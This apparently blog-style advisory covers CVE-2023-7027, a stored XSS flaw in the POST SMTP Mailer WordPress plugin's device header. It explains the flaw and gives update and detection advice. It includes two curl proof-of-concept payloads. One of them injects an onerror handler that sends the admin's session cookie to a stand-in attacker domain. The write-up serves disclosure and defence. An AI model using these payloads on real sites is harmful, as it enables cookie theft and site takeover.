CVE-2023-7027 - Critical Stored XSS in POST SMTP Mailer for WordPress – How Attackers Can Hack Your Email Logs

The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin (versions up to and including 2.8.7) was recently identified with a severe security hole: CVE-2023-7027. This vulnerability lets attackers execute malicious scripts right inside your WordPress dashboard — even if they aren’t logged in.

Let’s dive into what this means, why it’s dangerous, and how hackers can exploit it — with code examples and solutions.

What Is CVE-2023-7027?

CVE-2023-7027 is a Stored Cross-Site Scripting (XSS) vulnerability. It’s triggered when the device HTTP header isn’t properly sanitized or escaped, allowing attackers to inject JavaScript (or other scripts) into the site. Anyone visiting an affected admin page, such as email logs, can have that script run in their browser.

- Affected plugin: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress

Bug location: device header field

If you’re using this plugin below v2.8.8, update immediately!

References:
- Wordfence Security Advisory
- NVD CVE Details
- Plugin Changelog

How Does the Exploit Work?

The plugin records details about devices in email logs, taking the device header from incoming requests. Unfortunately, it saves this value directly into the database without cleaning it up — and then shows it to admins on the Email Log page.

This means an attacker can send a POST request with a malicious device header. Next time an admin opens the Email Log, their browser executes whatever code the attacker injected.

Let’s see how a hacker might do this. They’ll use a tool like curl to send a request

curl -X POST \
  -H "device: <script>alert('Hacked by XSS!');</script>" \
  -d "to=admin@example.com&subject=test&body=Hello" \
  https://victimsite.com/wp-json/wp/v2/postsmtp/send

What happens:
- That <script>...</script> code is saved in the email log.

More Dangerous Example

curl -X POST \
  -H "device: <img src=x onerror='fetch(\"https://attackerdomain.com/?cookie=\"+document.cookie)'>" \
  -d "to=admin@example.com&subject=test&body=Hello" \
  https://victimsite.com/wp-json/wp/v2/postsmtp/send

*This one silently sends the admin’s session cookie to the attacker’s server.*

Stored XSS: The payload stays in your database until you clean it out.

- Admin Privileges: An attacker’s script runs in the context of whoever views the log — usually a site admin!

No login needed: Anyone, even bots, can send the request.

- Full site takeover: XSS in WordPress can lead to new admin users, plugin installation, settings changes, or site defacement.

Fix & Protection

If you still use this plugin:

Upgrade to version 2.8.8 or newer now!

- Official Plugin Page

What did the patch do?
The developers updated the plugin to properly sanitize and escape inputs, including the device field, preventing any code from being executed.

Worried you’re already hit?

1. Check Admin Email Logs: Go to the POST SMTP plugin’s admin log. Look for suspicious entries — especially ones containing <script> tags.

Scan with Wordfence or similar: Security plugins often catch XSS.

3. Manual Test: (Careful!) Use the curl examples above on a staging site to see if your plugin’s log displays the script as code or as plain text.

Conclusion

CVE-2023-7027 is a textbook example of why input sanitization matters. If you use POST SMTP Mailer for WordPress, update right now before hackers inject dangerous code.

Stay safe, and keep your plugins fresh!

References:
- Wordfence Report
- NVD Entry: CVE-2023-7027
- Changelog for POST SMTP Mailer

Timeline

Published on: 01/03/2024 05:15:11 UTC
Last modified on: 02/02/2024 16:30:28 UTC